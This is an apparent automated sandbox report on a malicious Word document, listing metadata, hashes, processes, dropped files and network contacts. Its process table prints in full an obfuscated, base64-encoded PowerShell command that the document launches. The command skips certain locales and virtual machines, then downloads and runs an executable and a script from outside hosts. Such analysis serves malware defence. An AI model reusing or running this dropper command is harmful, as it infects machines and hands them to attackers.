File name: | Avviso-40928.doc |
Full analysis: | https://app.any.run/tasks/78ccb1ea-fd14-448e-bbe9-e192042f0188 |
Verdict: | Malicious activity |
Analysis date: | September 19, 2019, 11:46:55 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: Administrator, Revision Number: 9, Name of Creating Application: Microsoft Office Word, Total Editing Time: 21:00, Create Time/Date: Sun Sep 8 16:10:00 2019, Last Saved Time/Date: Sun Sep 8 19:15:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | CC923C09537468C5743BFAA64399EA0C |
SHA1: | A788BABCC5A3964B41BC5DA76850B52DA4A62177 |
SHA256: | 7927BBF0D435FF03F178FFBBA13CE1F1AED7D84969BBCA61A7486B87D2781FA5 |
SSDEEP: | 1536:BC3hskRSSuclIyTPHkDD+WZbS+a9x/iIm:BIRSSuclIyoDDk6 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Administrator |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | Administrator |
RevisionNumber: | 9 |
Software: | Microsoft Office Word |
TotalEditTime: | 21.0 minutes |
CreateDate: | 2019:09:08 15:10:00 |
ModifyDate: | 2019:09:08 18:15:00 |
Pages: | 1 |
Words: | - |
Characters: | 1 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 1 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3432 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Avviso-40928.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2868 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'O2lmKCgoR2V0LVVJQ3VsdHVyZSkuTmFtZSAtbWF0Y2ggIkNOfFJPfFJVfFVBfEJZIikgLW9yICgoR2V0LVdtaU9iamVjdCAtY2xhc3MgV2luMzJfQ29tcHV0ZXJTeXN0ZW0gLVByb3BlcnR5IE1vZGVsKS5Nb2RlbCAtbWF0Y2ggIlZpcnR1YWxCb3h8Vk13YXJlfEtWTXxIVk0iKSl7ZXhpdDt9OyRhPUpvaW4tUGF0aCAkZW52OlB1YmxpYyAiXExpYnJhcmllc1xXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlLmpzIjskYj1Kb2luLVBhdGggJGVudjp0ZW1wICJNaWNyb3M2NC5leGUiO3RyeXsoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly9zZXIuam9ubmFsYmFuZGlhbi5jb20vbGFzdHVwZGF0ZS56aXA/dGdoeWpmaGoiLCRiKTsgU3RhcnQtUHJvY2VzcyAkYjt9Y2F0Y2h7fTs7dHJ5eyhOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwOi8vd3dzLmNocmlzdGluZWRhdmllcy5iaXovP3BhZ2U9cmluZyZ2aWQ9cGl0NyZzeWZlcyIpfG91dC1maWxlICRhO1N0YXJ0LVByb2Nlc3MgJGE7fWNhdGNoe307' ) );iex $a; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3432 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9BE7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2868 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LMRC9O7P7509WC7CT21W.temp | — | |
MD5:— | SHA256:— | |||
3432 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$viso-40928.doc | pgc | |
MD5:0D324D45EB03F6DB5F5A0F4721A98870 | SHA256:DEB44A9DB11125E3ADEA8A462C7A5844F6A6293E746F39937918E8E61AA2336B | |||
3432 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:62F2DA178DD59EBA6B61EE250E55F925 | SHA256:8CF938206B83D51659082A32A71F3A9F077217F5A2E07A98541350C60245A244 | |||
2868 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16a4a1.TMP | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
2868 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2868 | powershell.exe | 185.158.249.39:80 | ser.jonnalbandian.com | easystores GmbH | NL | unknown |
Domain | IP | Reputation |
---|---|---|
ser.jonnalbandian.com |
| unknown |